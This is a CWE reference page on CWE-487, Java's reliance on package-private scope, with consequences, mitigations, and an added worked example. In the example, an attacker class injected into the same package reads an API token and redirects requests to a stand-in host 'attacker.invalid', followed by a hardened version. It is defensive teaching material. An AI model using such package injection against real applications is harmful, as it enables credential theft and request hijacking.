Abstraction: Base
Status: Incomplete

CWE-487: Reliance on Package-level Scope

Category: other

Description

Java packages are not closed: any class compiled with the same `package` declaration becomes a member of that package, no matter which JAR it ships in (unless the package is sealed or lives in a named module). Relying on package-private (default) visibility for code security is therefore not a good practice. The purpose of package scope is to prevent accidental access by other parts of a program; it is a software-development convenience, not a security feature.

Common consequences

  • Confidentiality — Read Application Data
    A package-private class, field or method is accessible to every class whose declared package name matches. Once the package is distributed, an attacker can compile a class into that package name, load it alongside the application and read the data.
  • Integrity — Modify Application Data
    The same injected class can assign to package-private fields that are not final and call package-private methods, altering the application's state from outside its own code.

Potential mitigations

  • [Architecture and Design, Implementation] Declare sensitive fields private, and make them static final when they are constants, rather than leaving them at the default (package-private) visibility. private is enforced by javac and by the JVM's access checks against every class other than the declaring one, including classes an attacker compiles into a same-named package; final prevents the value from being replaced after class initialization. Do not treat package scope as a trust boundary: if a package must be protected from injected classes, seal it in the JAR manifest (Sealed: true) or ship it in a named module, both of which stop a second JAR from contributing classes to that package.
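The following worked example is added to this page and is not part of MITRE's entry; it illustrates both the description (a second JAR joining the package) and the mitigation above (private static final fields). All file names, package names, token values and URLs are constructed for illustration.

```java
// ---- File: app/com/example/vault/TokenStore.java  (application code, WEAK) ----
package com.example.vault;

// Package-private class and fields: the author relies on package scope to keep
// the token inside com.example.vault. Nothing stops another JAR from declaring
// the same package name (CWE-487).
class TokenStore {
    static String apiToken = "sample-token-0000";               // constructed value
    static String endpoint = "https://api.example.invalid/v1";  // constructed value
}

// ---- File: app/com/example/vault/Client.java  (application code) ----
package com.example.vault;

public final class Client {
    private Client() {}

    // Builds the outbound request line; real code would send it over HTTP.
    public static String request(String payload) {
        return "POST " + TokenStore.endpoint
             + " | Authorization: Bearer " + TokenStore.apiToken
             + " | " + payload;
    }
}

// ---- File: evil/com/example/vault/Intruder.java  (attacker code, separate JAR) ----
// Same package name, compiled against the application's classes. The JVM grants
// package-private access because the runtime package matches and both classes
// are loaded by the same (application) class loader.
package com.example.vault;

public final class Intruder {
    public static void main(String[] args) {
        System.out.println("read:   " + TokenStore.apiToken);     // Confidentiality
        TokenStore.endpoint = "https://attacker.invalid/collect";  // Integrity
        System.out.println("hijack: " + Client.request("{\"q\":1}"));
    }
}

// Build and run (constructed paths):
//   javac -d app-classes  app/com/example/vault/*.java
//   javac -cp app-classes -d evil-classes evil/com/example/vault/Intruder.java
//   java  -cp app-classes:evil-classes com.example.vault.Intruder
// The token is printed and every later request is redirected to attacker.invalid.

// ---- File: app/com/example/vault/TokenStore.java  (HARDENED) ----
package com.example.vault;

final class TokenStore {
    // private: enforced by javac and by JVM access checks for every class other
    // than TokenStore, whatever package it declares.
    // final: cannot be reassigned after class initialization.
    private static final String apiToken = "sample-token-0000";
    private static final String endpoint = "https://api.example.invalid/v1";

    private TokenStore() {}

    // Expose behaviour rather than the fields; Client calls this instead of
    // touching TokenStore.apiToken / TokenStore.endpoint directly.
    static String request(String payload) {
        return "POST " + endpoint + " | Authorization: Bearer " + apiToken + " | " + payload;
    }
}
// Rebuilding Intruder against the hardened classes now fails:
//   error: apiToken has private access in TokenStore
// and an Intruder class compiled earlier throws java.lang.IllegalAccessError
// at run time when it touches the fields.
```

Two caveats. First, private stops other classes, including same-package intruders, from naming the field, but code running in the same JVM can still reach it through reflection with setAccessible(true) unless the class is in a named module that does not open the package; private is an access-control boundary, not a secrecy boundary against arbitrary code in the process. Second, the injection itself is prevented by sealing the package (a `Sealed: true` entry for `com/example/vault/` in the JAR manifest makes the class loader reject classes of that package from any other JAR) or by shipping the package in a named module, since the module system forbids two modules from containing the same package.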

References

  1. https://cwe.mitre.org/data/definitions/487.html

Related by meaning

Nearest entities by semantic similarity across the cs-graph corpus.

  • CWE: Use of Inner Class Containing Sensitive Data
  • CWE: Public Static Final Field References Mutable Object
  • CWE: Direct Use of Unsafe JNI
  • CWE: Serializable Class Containing Sensitive Data
  • CWE: Public Static Field Not Marked Final
  • CWE: Cloneable Class Containing Sensitive Information

Sourced from MITRE CWE 4.20. Curated for EU compliance use cases by Adam Lundqvist, Founder at SQUR.